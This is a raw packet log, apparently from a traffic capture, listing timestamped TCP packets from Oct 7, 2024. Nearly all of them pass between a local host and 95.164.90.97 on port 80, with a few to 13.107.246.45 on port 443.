Oct 7, 2024 03:15:37.637759924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637761116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637810946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637810946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637849092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637860060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637897015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637901068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637933016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637948990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.637965918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.637984991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638000965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638015032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638035059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638048887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638084888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638092041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638135910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638143063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638175964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638191938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638231993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638237953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638295889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638329029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638356924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638362885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638396978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638402939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638434887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638437033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638454914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638469934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638488054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638503075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638519049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638535976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638550997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638566971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638580084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638601065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638613939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638633966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638645887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638668060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638680935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638701916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638719082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638736963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638751984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638770103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.638786077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.638817072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639345884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639401913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639415979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639451027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639465094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639484882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639499903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639522076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639535904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639555931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639570951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639604092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639610052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639658928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639661074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639695883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639708996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639744043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639750004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639785051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639796972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639832020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639834881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639887094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639888048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639930010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.639935017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639981985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.639985085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640013933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640032053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640047073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640060902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640079975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640094995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640116930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640130043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640151024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640163898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640185118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640198946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640218973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640232086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640264988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640331984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640382051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640383959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640431881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640434027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640466928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640480995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640499115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640515089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640533924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640551090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640567064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640579939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640605927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640614986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640650034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640657902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640708923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640710115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640739918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640754938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640788078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640790939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640827894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640836000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640861034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640875101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640896082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640908957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640929937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640943050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640964031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.640978098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.640996933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641012907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641031027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641045094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641064882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641082048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641098022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641108036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641132116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641141891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641165972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641180992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641201019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641211033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641233921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641248941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641263962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641283035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641294956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641307116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641330004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641344070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641376972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641401052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641436100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641448975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641472101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.641483068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.641520977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662229061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662280083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662331104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662363052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662396908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662429094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662462950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662496090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662529945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662563086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662594080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662596941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662594080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662594080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662594080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662626028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662631989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662667990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662693977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662700891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662729979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662736893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.662775040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.662792921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.699120045 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.700687885 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.700711966 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.701143026 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.701149940 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.714251995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714358091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714411020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714443922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714449883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714479923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714495897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714521885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714529991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714554071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714564085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714581966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714596987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714631081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714648008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714663982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714689016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714698076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714725018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714730978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714749098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714766026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714781046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714802027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.714813948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.714853048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728061914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728162050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728198051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728230953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728231907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728251934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728266954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728296995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728298903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728333950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728333950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728358984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728408098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728844881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728897095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728930950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728961945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.728982925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.728993893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729017019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729077101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729130030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729182959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729185104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729217052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729234934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729266882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729270935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729302883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729321003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729355097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729357004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729387999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729404926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729422092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729437113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729454994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729487896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729501009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729515076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729532957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729547024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729568005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729582071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729603052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729617119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729636908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729639053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729665041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729669094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729703903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729726076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729737043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729768038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729770899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729803085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729810953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729830980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729836941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729871035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729897976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729903936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729935884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729939938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.729969978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.729990959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730045080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730392933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730426073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730448961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730484009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730535984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730537891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730568886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730586052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730660915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730664015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730714083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730716944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730767012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730771065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730822086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730823994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730859041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730873108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730906963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730914116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.730962992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.730966091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731013060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731018066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731050968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731066942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731085062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731103897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731118917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731136084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731149912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731168032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731184959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731199026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731232882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731270075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731318951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731324911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731357098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731395006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731408119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731422901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731475115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731527090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731527090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731560946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731580019 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731595039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731616974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731627941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731643915 CEST	49782	80	192.168.2.5	95.164.90.97
